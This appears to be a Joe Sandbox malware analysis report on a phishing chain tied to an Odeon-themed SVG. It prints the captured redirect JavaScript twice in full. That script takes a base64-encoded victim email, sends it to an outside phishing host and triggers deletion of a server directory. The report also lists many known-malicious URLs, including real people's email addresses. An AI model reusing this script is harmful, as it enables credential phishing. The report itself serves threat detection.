(function() { // Check if the URL contains a hash fragment if (window.location.hash) { var fragment = window.location.hash.substring(1); // Remove the '#' symbol var newUrl = window.location.href.split('#')[0] + fragment; // Rewrite URL window.location.replace(newUrl); // Redirect with the cleaned URL } else { // Existing logic for query string handling var queryString = window.location.search.substring(1); var hash = ''; if (queryString.indexOf('&&') !== -1) { hash = queryString.split('&&')[1].split('=')[1]; // Extract '0Ec' value } // Function to clean and validate the hash function cleanHash(hash) { var base64EndPos = hash.indexOf('%'); if (base64EndPos === -1) { base64EndPos = hash.length; } var base64String = hash.substring(0, base64EndPos); try { var decodedEmail = atob(base64String); var emailPattern = /^[^@\s]+@[^@\s]+\.[^@\s]+$/; if (emailPattern.test(decodedEmail)) { return base64String; } } catch (e) { return false; } return false; } // Clean the hash var cleanedHash = cleanHash(hash); // Check if the cleaned hash is valid if (cleanedHash) { var encodedHash = encodeURIComponent(cleanedHash); // Encode the cleaned hash encodedHash = hash.replace(/%3D/g, '='); // Replace %3D with '=' var newUrl = 'https://' + 'ECpzUyqrhB' + '.pdfimgviewer.top/n6drat55y/iu89908445/?pln=' + encodedHash; window.location.href = newUrl; // Redirect to the constructed URL } else { // Redirect to 404 if the hash is invalid window.location.href = 'https://' + 'ECpzUyqrhB' + '.dsiewd.com/404.php'; } } // Delay the deletion to ensure the redirect happens first setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.open('GET', '/delete_directory.php?dir=' + encodeURIComponent('7FYuA1'), true); xhr.send(); }, 3000); // 3-second delay })();
URL: https://viewqr_img_7fyua1.tsbsky.top/7FYuA1/7FYuA1... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "High-risk script showing multiple red flags: 1) Redirects to suspicious domains (.pdfimgviewer.top, .dsiewd.com) 2) Uses base64 encoding/decoding for data manipulation 3) Contains domain obfuscation ('EAtnjYZ20R') 4) Attempts directory deletion via XHR 5) Processes and exfiltrates email addresses. Pattern matches typical phishing/malware redirect chain." }
(function() { // Check if the URL contains a hash fragment if (window.location.hash) { var fragment = window.location.hash.substring(1); // Remove the '#' symbol var newUrl = window.location.href.split('#')[0] + fragment; // Rewrite URL window.location.replace(newUrl); // Redirect with the cleaned URL } else { // Existing logic for query string handling var queryString = window.location.search.substring(1); var hash = ''; if (queryString.indexOf('&&') !== -1) { hash = queryString.split('&&')[1].split('=')[1]; // Extract '0Ec' value } // Function to clean and validate the hash function cleanHash(hash) { var base64EndPos = hash.indexOf('%'); if (base64EndPos === -1) { base64EndPos = hash.length; } var base64String = hash.substring(0, base64EndPos); try { var decodedEmail = atob(base64String); var emailPattern = /^[^@\s]+@[^@\s]+\.[^@\s]+$/; if (emailPattern.test(decodedEmail)) { return base64String; } } catch (e) { return false; } return false; } // Clean the hash var cleanedHash = cleanHash(hash); // Check if the cleaned hash is valid if (cleanedHash) { var encodedHash = encodeURIComponent(cleanedHash); // Encode the cleaned hash encodedHash = hash.replace(/%3D/g, '='); // Replace %3D with '=' var newUrl = 'https://' + 'EAtnjYZ20R' + '.pdfimgviewer.top/n6drat55y/iu89908445/?pln=' + encodedHash; window.location.href = newUrl; // Redirect to the constructed URL } else { // Redirect to 404 if the hash is invalid window.location.href = 'https://' + 'EAtnjYZ20R' + '.dsiewd.com/404.php'; } } // Delay the deletion to ensure the redirect happens first setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.open('GET', '/delete_directory.php?dir=' + encodeURIComponent('7FYuA1_1'), true); xhr.send(); }, 3000); // 3-second delay })();
URL: https://eatnjyz20r.pdfimgviewer.top/n6drat55y/iu89908445/?pln=c2pvc2xpbkBvZGVvbnVrLmNvbQ== Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: PDF document Model: Joe Sandbox AI	{ "brands": [ "ODEON CINEMAS GROUP" ] }
	{ "brands": [ "ODEON CINEMAS GROUP" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.96.109.146	https://u43142955.ct.sendgrid.net/ls/click?upn=u001.Gwt2bd6jafSW0bhGOZxCpHboWYCK1fpGugNfVI4xx7HajV5KF46rl0P8XxC3HxiEvCgyexdrfZEk4KmKIeNW4g-3D-3DE6Dd_1-2FlQ5R7jXHW5rdNHc-2FQfdimftix3nzIaA-2Fgs7zlnG3JzsdJCtPz-2B1fwxHZ-2F-2FsvMgd7oIeB6-2B1Zy1tI9h8rNHK1ewPD6-2FSCEzyoB2WHz6bf3YXu4gzg4k9sFFAiSRE9SwryOLfrZ6xDWX308wcZqAdkXtdTymDU7Zg-2FJxlBVILy5rHdoQgFoj-2FjPJ925RwuJATcazrHOSTbiMAumCjdhXASdO98et-2BGMjEioGPtLGD2Q-3D	Get hash	malicious	HTMLPhisher	Browse
	https://lnk.to/KGIA89	Get hash	malicious	HTMLPhisher	Browse
	https://docsend.com/view/mhk3mgyaur474he5&c=E,1,ZZjBRgt5bLQjmkdDJfV4oynrcdEgDnYJeVME47ETnWqqrK3ZsXJABzY_6VPVZWMkbhMGNfSKCEHBuGc_IjbuowhxZOCuXcbSEtKjYKfnBOIi47dKeaiA_rgDynM,&typo=1	Get hash	malicious	HTMLPhisher	Browse
	https://r20.rs6.net/tn.jsp?f=001xf2gldFlTem41gOlcWcMlefLkPrBA_QC49zgWJj0kNBgjxgvySpHX1k29GIQ7nBh4gtZM_hTvMFyPOx3XgRQDGWJFlXziweRbuAGeNnE6TIckwQBTljZjCqNGipjsqnsoFb7eDxExL-0UURxtg4z6fl-0zTi7G0ZNPIVenbV0mA&ch==&ch=&__=ZGllZ28uem9udGFAYmVhbnRlY2guaXQ=	Get hash	malicious	HTMLPhisher	Browse
	https://nigiwif103-cuj.kleap.co/kleap-page-1704988588099	Get hash	malicious	HTMLPhisher	Browse
	https://necowater-my.sharepoint.com/:f:/p/pbaumer/Erb0K2oih7ZBqywMH_sUDHoBVFLWcTTS62zQhkRrJwfJ6Q?e=fWjo1v	Get hash	malicious	HTMLPhisher	Browse
	http://shankkits.uk	Get hash	malicious	HTMLPhisher	Browse
	https://outlook.office365.com/Encryption/retrieve.ashx?recipientemailaddress=jjeffries%40hess.com&senderemailaddress=mryan%40self-helpfcu.org&senderorganization=AwF%2fAAAAAnsAAAADAQAAAHNGBljCjudIhdDM0ds7khZPVT1zZWxmaGVscC5vbm1pY3Jvc29mdC5jb20sT1U9TWljcm9zb2Z0IEV4Y2hhbmdlIEhvc3RlZCBPcmdhbml6YXRpb25zLERDPU5BTVBSMDdBMDA0LERDPXByb2QsREM9b3V0bG9vayxEQz1jb21%2bwCuzU%2bm5SrJlHEdL5TdSQ049Q29uZmlndXJhdGlvbixDTj1zZWxmaGVscC5vbm1pY3Jvc29mdC5jb20sQ049Q29uZmlndXJhdGlvblVuaXRzLERDPU5BTVBSMDdBMDA0LERDPXByb2QsREM9b3V0bG9vayxEQz1jb20B&messageid=%3cDM3PR08MB96214545C4A4E6D4DF2CEC53DB85A%40DM3PR08MB9621.namprd08.prod.outlook.com%3e&cfmRecipient=SystemMailbox%7b2C41C89D-35A4-465B-B69B-6F1FC54D8B03%7d%40selfhelp.onmicrosoft.com&consumerEncryption=false&senderorgid=a5294653-d816-497c-9e00-a21fa49baeaf&urldecoded=1&e4e_sdata=C%2fHpeoNY3L2lCpU6Eogj3EZ8n7%2fAOGuIikiNRGDDx%2fCrribSzdDQG%2fP7pkJoPb9MP5RHhIj51QknLkqGjQRz5hz394FmNOTuy%2bcx8Tn1cHDCRHWnXn3osYD%2bpwEfJ8sdrqHyKcy5HusvFXux6OF03foupb2LChfYJaqQ2DRnr4qRT8zGNNvQlDNkwKUKPL2FlIIKPu5AssQfZAsxGTnCVYTIEL%2b2q4eNqKA4YGsi%2fH5sIZKmLMp76C%2fkH%2f8RB3dzOtmXjBH%2f4xpSnrjoSWn1Md2BsfVCnwuQgilXJ%2fEiVDxguMrq6OBuPGxgfqG4h%2bCSy5Ln%2bzWIOCqtQ2ntco2lmQ%3d%3d	Get hash	malicious	Unknown	Browse
	https://access-useraccountmicrosoftsharefiles.unlimited-offshore.com/?90JC2=3cHg8g	Get hash	malicious	Unknown	Browse
	https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=c9ct-JxZsk-jJS80hGtAlTq2MtBiyU9HvkPgDjD-UZdUMUFLWFNXM0xGUlQ1NU8zVk5aN01HSFdLRy4u	Get hash	malicious	HTMLPhisher	Browse
52.96.97.178	https://66259.enviolog.com.br/xiuweiwjayem/dyeitiouyd/t2TrNi/jamie.cao@hfw.com	Get hash	malicious	HTMLPhisher	Browse
	https://energyexplorationtech-my.sharepoint.com/:f:/g/personal/matthew_jordan_energyexplorationtech_onmicrosoft_com/Eutt63ri_fxJp-ldVsqBKcMBig5tJSIRYH8Jz2cCkpGq6A?e=jprcz0	Get hash	malicious	Unknown	Browse
	https://ncv.microsoft.com/QvNtOf45jX	Get hash	malicious	Unknown	Browse
	http://url7301.changinglifebrands.com/ls/click?upn=FDCLzZqBFjkYExv-2FlPJrLYjVG75f-2BW-2BoonXtXn-2B9xo0R0PBY5w4kiEit-2B3xuO12-2FvRu3_Mj-2FciSswvBdfEnfNyoSWC5nRYDcHyMR55xApxgmGQj7N5BhlaOIWJpwRXccUYQfJ9SJ2UmeuU3VXT83pkH3oopif5mk8dG4nbZR-2BSzjwMhF0AlaPdprQI-2F3y8ToO1-2Fk-2Bkh-2BzEBeLx3OvuygLxdyfRXgPCtP5RZtf1RK-2B7g7oZ4o6R8T5vX6v25-2FQNm-2BVLaAZwYaUSsDIzkPTPgoa8FIBxgGqzBvlufS1p1XD9w0A9ew-3D#YWFyb24uZXZhbnNAYWxnb21hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse
	https://upvir.al/153868/lp153868	Get hash	malicious	HTMLPhisher	Browse
	https://masalaconsultors-my.sharepoint.com/:f:/p/masala/Ej7vVTtvURJDk1GzvpWm3yYBJhixTTqkT6A58To07iY5tA?e=NZEbrh	Get hash	malicious	HTMLPhisher	Browse
	http://thelinktulsa.org/?userid=username@yourcompanyemail.com	Get hash	malicious	HTMLPhisher	Browse
	msg73858551Creationtech.htm	Get hash	malicious	HTMLPhisher	Browse
152.195.19.97	http://ustteam.com/	Get hash	malicious	Unknown	Browse	www.ust.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
google.com	file.exe	Get hash	malicious	Credential Flusher	Browse	172.217.19.206
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	64.233.185.103
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.1
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	142.250.181.68
	https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==	Get hash	malicious	Unknown	Browse	142.250.181.68
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	142.250.181.68
	file.exe	Get hash	malicious	Credential Flusher	Browse	142.250.181.142
	file.exe	Get hash	malicious	Credential Flusher	Browse	172.217.17.46
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.217.21.36
	Valutazione della sicurezza IT - Azione urgente richiesta.html	Get hash	malicious	Unknown	Browse	172.217.21.36
sni1gl.wpc.sigmacdn.net	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	152.195.19.97
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	152.199.21.175
	letter_olivia.law_mercerhole.co.uk.pdf	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	IMG_1205 #U2014 ThingLink.html	Get hash	malicious	Unknown	Browse	152.199.21.175
	Gale Associates, Inc.pdf	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://public-eur.mkt.dynamics.com/api/orgs/88a21dbe-0cab-ef11-b8e4-000d3ab73076/r/ITDpQP9xc0mGhZTOns8zcwIAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fescclim-my.sharepoint.com%252F%253Ao%253A%252Fg%252Fpersonal%252Ftech_esc_esc-clim_com%252FEhAtf79h6jhPmHVrOq0G3zQBcIqaUIUgKKgPrxeGvockQA%253Fe%253D4LkyBM%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=w8KszEUMxRXpc4kyRepudGYpxF6dCJlj%2BwOvs5Es14I%3D&secretVersion=7c13c22c20aa46a1b2fc8b71fde4d19a	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://tractopieces35-my.sharepoint.com/:o:/g/personal/lecomte22_tracto-pieces_fr/EqM9FMd6batFtzMgdv1f2XUBmLAJecWys730N_AOVrXnXA?e=3TLKO8	Get hash	malicious	Unknown	Browse	152.199.21.175
LYH-efz.ms-acdc.office.com	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.96.38.82
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:b16cefb3-39c1-4a56-9dcd-a9bf6a2b97dd	Get hash	malicious	HTMLPhisher	Browse	52.96.173.178
	https://api-internal.weblinkconnect.com/api/Communication/Communication/1628411/click?url=https://devbook.net/cloudflare&x-tenant=NorthernKentuckyKYCOC	Get hash	malicious	HTMLPhisher	Browse	52.96.54.210
	https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/	Get hash	malicious	HTMLPhisher	Browse	52.96.104.50
	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	52.96.165.130
	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	52.96.28.178
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	52.96.184.18
	https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdA	Get hash	malicious	HTMLPhisher	Browse	52.96.122.82
	https://u44058082.ct.sendgrid.net/ls/click?upn=u001.wjMLvmoK1OC9dTKy5UL4VbqcIJmZWkGKJypB0ZF6j6rXk8HVnxe0g2af-2BenroUoONz6EEWthgE-2Bi2vVRUosKTZRVQ5v63hCdxrdKCztVooIv51imK8tr-2Bb3beAsH6u-2FNluJlUKmd7nST-2B9m-2Bl2Rgv4y6uHLimO0TjhZzZ-2F-2BDlllJQne3tT99z6x4W12pJpddTL-2BoJ2-2Bdo6961pFN3dV2Rg-3D-3DeWGT_h-2FW4DSvZGhKY-2FmU3Rq-2F3L-2FXo2OZSHdaVvlpgAgHQWDXPYB9CNYi-2FcvonFCbsEhjt9RP-2BQa7dTwbMJOOaP3JRnMW6mQAitl6qAb1EkaAR-2BmnZDE6Bi3ooqtCrrMW-2F3TPNMK3AVi1YKIdTOZivmUJGaXdrtbqCykfnTTkN9KMRy80rdRqf6LWUCYWGeeaXb-2BD6jokMbr-2FaJKvKMHDNWAfHyhaE6QO9pw7souFUseKb40g-3D	Get hash	malicious	HTMLPhisher	Browse	52.96.189.2
	https://assets-usa.mkt.dynamics.com/6f8aa86c-81f8-ee11-a1fa-0022482e8338/digitalassets/standaloneforms/4b367e61-8601-ef11-a1fd-0022482f3701	Get hash	malicious	HTMLPhisher	Browse	52.96.165.210

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.96.183.226
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.98.61.50
	Downloader.hta	Get hash	malicious	Unknown	Browse	20.233.83.145
	https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==	Get hash	malicious	Unknown	Browse	13.107.43.14
	Valutazione della sicurezza IT - Azione urgente richiesta.html	Get hash	malicious	Unknown	Browse	13.107.43.14
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	20.233.83.145
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	20.233.83.145
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	20.62.247.7
	rebirth.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	13.95.148.131
CSCUS	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	165.160.15.20
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.13.20
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	165.160.13.20
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	165.160.13.20
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	165.160.15.20
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	165.160.15.20
	SetupRST.exe	Get hash	malicious	Unknown	Browse	165.160.13.20
MICROSOFT-CORP-MSN-AS-BLOCKUS	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.96.183.226
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	52.98.61.50
	Downloader.hta	Get hash	malicious	Unknown	Browse	20.233.83.145
	https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==	Get hash	malicious	Unknown	Browse	13.107.43.14
	Valutazione della sicurezza IT - Azione urgente richiesta.html	Get hash	malicious	Unknown	Browse	13.107.43.14
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	20.233.83.145
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	20.233.83.145
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	20.62.247.7
	rebirth.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	13.95.148.131
EDGECASTUS	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	152.195.19.97
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://sgwarch-my.sharepoint.com/:f:/p/setup1/EiozDTFdgcdOj57XSlxa0wgB_yucGXpVtBz0YeRUUS4djA?e=J1BMm6&xsdata=MDV8MDJ8bG9nYW5AaG9sdHhwLmNvbXw4NzViY2I1MjBhNzQ0NjAxMGYxODA4ZGQxODZlODVlN3w0Y2NhZDYyOTg3ZWM0MmRmOTU3YTYxMmI0OTU2YmE3NXwwfDB8NjM4NjkzNTg1MTc0NTY1ODEyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=cmt5N3BwOXR0VGIwbDEyNWFnZmRKYVBMMzhQVUJ4bmJpNnppZGtydXJjST0%3d	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://xxx.cloudlawservices.com/fROBJ/	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Play_VM-NowCRQW.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://maya-lopez.filemail.com/t/BLFGBJSQ	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://jdjdhjh.uscourtdocuments.com/A3RjQ	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	http://www.sbh.co.uk/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	152.199.21.175
	IMPORTANT DOCUMENT.html	Get hash	malicious	Unknown	Browse	152.199.19.160

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	PC bitmap, Windows 3.x format, 134 x -190 x 32, cbSize 101894, bits offset 54
Category:	dropped
Size (bytes):	101894
Entropy (8bit):	0.7343606320946621
Encrypted:	false
SSDEEP:	96:doIKhLAIPG6HtkGlUDRbljnXZ3MEReVDZPP4QuuhSxekzacFfyWiIxfZ:RmtczZ5+BuoeekzacF6WiIxfZ
MD5:	933F4E3CF0FE72A8E4D8D2234FF1E9E8
SHA1:	BE62EAB7A3FB7BE39663865ADBA364FD7EEB0A9D
SHA-256:	4435F3029F4D695FE55A3A88E57B4439908501F19ABDDB675B93F0599EF221BF
SHA-512:	7435748B912E66B3E4F14C632A7057CBF30BE409AB9289ED33372861D31D05614F3289511BE8BD3D856ED993D071ABDCC8C6D6175733B096E44CF29724BC23DD
Malicious:	false
Reputation:	low
Preview:	BM........6...(.......B..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Source: 0.7.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://eatnjyz20r.pdfimgviewer.top/n6drat55y/iu89... High-risk script showing multiple red flags: 1) Redirects to suspicious domain 'bngme.top' with random subdomains, 2) Uses base64 encoding/decoding to obfuscate data transmission, 3) Implements deceptive loading simulation to mask malicious activity, 4) Contains URL manipulation and parameter encoding typical of phishing attacks, 5) Uses dynamic DOM manipulation to hide loading process. Pattern matches typical phishing page behavior.
Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://viewqr_img_7fyua1.tsbsky.top/7FYuA1/#7FYuA... High-risk script showing multiple malicious indicators: 1) Uses base64 encoding to obscure data, 2) Redirects to suspicious domains (pdfimgviewer.top and dsiewd.com), 3) Attempts to delete server directories, 4) Uses email pattern matching potentially for phishing, 5) Contains obfuscated domain names. Classic characteristics of a phishing/malware distribution script.
Source: 0.6.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://viewqr_img_7fyua1.tsbsky.top/7FYuA1/7FYuA1... High-risk script showing multiple red flags: 1) Redirects to suspicious domains (.pdfimgviewer.top, .dsiewd.com) 2) Uses base64 encoding/decoding for data manipulation 3) Contains domain obfuscation ('EAtnjYZ20R') 4) Attempts directory deletion via XHR 5) Processes and exfiltrates email addresses. Pattern matches typical phishing/malware redirect chain.

Source: Joe Sandbox View	IP Address: 52.96.109.146 52.96.109.146
Source: Joe Sandbox View	IP Address: 52.96.97.178 52.96.97.178
Source: Joe Sandbox View	IP Address: 152.195.19.97 152.195.19.97

Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.15
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.135.4
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.135.4
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.135.4
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.135.4
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.93.201
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.93.178
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.215.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.93.186
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.152.199.46
Source: unknown	TCP traffic detected without corresponding DNS query: 4.152.199.46
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

